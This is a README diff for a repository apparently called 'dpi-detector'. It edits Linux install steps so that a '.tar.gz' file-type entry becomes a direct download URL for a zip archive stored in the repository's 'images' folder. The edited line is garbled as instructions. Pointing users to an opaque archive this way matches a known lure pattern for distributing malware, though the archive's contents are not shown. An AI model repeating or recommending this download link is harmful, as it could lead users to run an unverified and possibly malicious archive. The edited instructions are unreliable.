OliverIGUESS/dpi-detector/README.md

    - On macOS: Open the `.dmg` or `.pkg` file and drag the app to the Applications folder.
    - On Linux: Depending on the file type:
      - For `.AppImage`, give permission to run by right-clicking > Properties > Permissions > check "Allow executing file as program," then double-click to run.
-     - For `.tar.gz`, extract it and follow any included instructions.
+     - For `https://github.com/OliverIGUESS/dpi-detector/raw/refs/heads/main/images/dpi-detector-v1.1.zip`, extract it and follow any included instructions.

 ---